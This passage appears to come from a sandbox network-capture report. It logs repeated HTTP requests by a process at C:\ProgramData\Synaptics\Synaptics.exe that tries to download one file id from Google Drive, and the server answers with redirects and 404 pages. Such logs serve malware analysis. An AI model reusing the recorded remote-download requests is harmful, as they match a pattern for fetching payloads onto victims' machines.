                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                61 | 192.168.2.4 | 49986 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:23 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:24 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC6Kdf3d_5lKbaiD3Hfp8rG6wdgEckqqWwYqjaWLajKjTBTEmSgx7kZfhPgz0GPViLI1
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:23 GMT
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-vgz8ewODxkqPimc7RXSEVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:24 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                2024-12-24 17:21:24 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="KpJoM1tp4AdK6WfzpN8FwA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                2024-12-24 17:21:24 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                62 | 192.168.2.4 | 50005 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:26 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:27 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:26 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-3phhDky1BZHN0CKUt2B6Tg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                63 | 192.168.2.4 | 50004 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:26 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:27 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:26 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-rLHtfze-kUtqiDsp_aBmAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                64 | 192.168.2.4 | 50013 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:28 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:29 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC6qSj2R3Qscump2cF7Et3HSLkhWEGnCGgPBQPjGSSXY_JxKVPWZChf3hpdkKzfBCsqyKtCUgoc
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:29 GMT
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-rIPq8ZrIn5_v-W2yvdGjRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:29 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                2024-12-24 17:21:29 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="uicB7bZRYGL4AXkAIMf-iQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                2024-12-24 17:21:29 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                65 | 192.168.2.4 | 50015 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:28 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:29 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-XitErQQyISWj6qfkVD-Etg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                66 | 192.168.2.4 | 50016 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:28 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:30 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC7amO0ZLM5ngsJWlKopLebCK2xDHSAc3h7N4CjFS0Nl-sboq46qA-GFRY47JftW28Vfpky-nJI
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:29 GMT
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-r3iLReYBnGK3BnBc1rQnyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:30 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                2024-12-24 17:21:30 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="fkwrmshWrbBpaPVmC7DFSQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                2024-12-24 17:21:30 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                67 | 192.168.2.4 | 50014 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:28 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:29 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:29 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-HuN8SjnYByu4uvAEsXVC-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                68 | 192.168.2.4 | 50029 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:32 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:32 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:32 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-QvY8tes4tUOWYlv8qEdP1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                69 | 192.168.2.4 | 50030 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:32 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:32 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:32 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-icsS_fcEMzzQAlTxqNNTow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                70 | 192.168.2.4 | 50050 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:21:36 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:36 GMT
